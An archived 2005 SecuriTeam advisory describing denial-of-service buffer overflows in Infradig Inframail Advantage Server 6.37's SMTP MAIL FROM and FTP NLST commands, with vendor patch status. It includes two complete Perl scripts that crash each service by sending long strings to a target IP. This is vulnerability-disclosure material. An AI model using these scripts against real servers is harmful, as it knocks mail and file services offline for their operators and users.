[NEWS] Infradig Systems Inframail Advantage Server Multiple DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 06/30/05

  • Next message: SecuriTeam: "[EXPL] PHP-Fusion Accessible Database Backups Download (Exploit)"
    To: list@securiteam.com
    Date: 30 Jun 2005 15:21:35 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Infradig Systems Inframail Advantage Server Multiple DoS
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.infradig.com/> Infradig servers are "servers that support
    SMTP, POP, IMAP, NNTP (NEWS), FTP, HTTP, WEBMAIL, WEBDAV, WAPMAIL, SIP,
    mailing-lists, calendars and document sharing".

    Lack of proper command filtering allows attackers to send a long string as
    a command which in turn will cause a buffer overflow that will in turn
    crash the Infradig server.

    DETAILS

    Vulnerable Systems:
     * Infradig Systems Advantage Server Edition version 6.37

    Immune Systems:
     * Infradig Systems Advantage Server Edition version 7.2

    The commands SMTP MAIL FROM: and FTP NLST vulnerable for buffer overflow.
    Issuing the character 'A' 40960 times as an argument to MAIL FROM: command
    will cause the ifmail.exe process to die and re-launch.

    Issuing the character 'A' roughly 102400 times to the NLST command and
    then issuing the character 'A' roughly 102400 times to the NLST command
    again will cause all processes running under the ifmailsvc.exe process to
    die and re-launch (these processes include slapd.exe, slurpd.exe,
    ifmail.exe, ifweb.exe and otheres).

    Vendor Status:
    The vendor has released a patch for Infradig Systems Advantage Server
    Edition.

    Exploit:
    Inframail_SMTPOverflow.pl
    #===== Start Inframail_SMTPOverflow.pl =====
    #
    # Usage: Inframail_SMTPOverflow.pl <ip>
    # Inframail_SMTPOverflow.pl 127.0.0.1
    #
    # Infradig Systems Inframail Advantage Server Edition 6.0
    # (Version: 6.37)
    #
    # Download:
    # http://www.infradig.com/
    #
    ##############################

    use IO::Socket;
    use strict;

    my($socket) = "";

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => "25",
                                        Proto => "TCP"))
    {
            print "Attempting to kill Inframail SMTP server at
    $ARGV[0]:25...";

            sleep(1);

            print $socket "HELO moto.com\r\n";

            sleep(1);

            print $socket "MAIL FROM:" . "A" x 40960 . "\r\n";

            close($socket);
    }
    else
    {
            print "Cannot connect to $ARGV[0]:25\n";
    }

    # EOF

    Inframail_FTPOverflow.pl
    #
    # Usage: Inframail_FTPOverflow.pl <ip>
    # Inframail_FTPOverflow.pl 127.0.0.1
    #
    # Infradig Systems Inframail Advantage Server Edition 6.0
    # (Version: 6.37)
    #
    # Download:
    # http://www.infradig.com/
    #
    ##############################

    use IO::Socket;
    use strict;

    my($socket) = "";

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => "21",
                                        Proto => "TCP"))
    {
            print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";

            sleep(1);

            print $socket "USER hello\r\n";

            sleep(1);

            print $socket "PASS moto\r\n";

            sleep(1);

            print $socket "NLST " . "A" x 102400 . "\r\n";

            sleep(1);

            print $socket "NLST " . "A" x 102400 . "\r\n";

            close($socket);
    }
    else
    {
            print "Cannot connect to $ARGV[0]:21\n";
    }

    #EOF

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:reedarvin@gmail.com> Reed
    Arvin.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[EXPL] PHP-Fusion Accessible Database Backups Download (Exploit)"

    Relevant Pages

    • [UNIX] OpenBB Multiple Vulnerabilities (board.php, search.php, member.php, post.php, myhome.php, ind
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... arbitrary command execution. ... snippet of code from one of the vulnerable scripts is presented ...
      (Securiteam)
    • [EXPL] I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A remote command execution vulnerability has been discovered in the I-Mall ... sub intro { ... chomp $host; ...
      (Securiteam)
    • [UNIX] Lukemftpd (Tnftpd) Multiple Vulnerabilities May Lead To Remote Code Execution
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... structure tab to indicate if it's acceptable for a command to occur in OOB ... delivering of ABOR and STAT commands in OOB mode. ...
      (Securiteam)
    • [UNIX] Sudo Race Condition Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A race condition with the Sudo command pathname handling allows a local ... When a user runs a command via Sudo, the inode and device numbers of the ... listed in the sudoers file is stored in the variable safe_cmnd, ...
      (Securiteam)
    • [NEWS] payShield Library Bad Requests Verification
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... When a command is sent through the SPP library the library may query its ... Although an error message will be printed to the payShield log this error ... There is a work-around to this problem, but it is more intrusive than ...
      (Securiteam)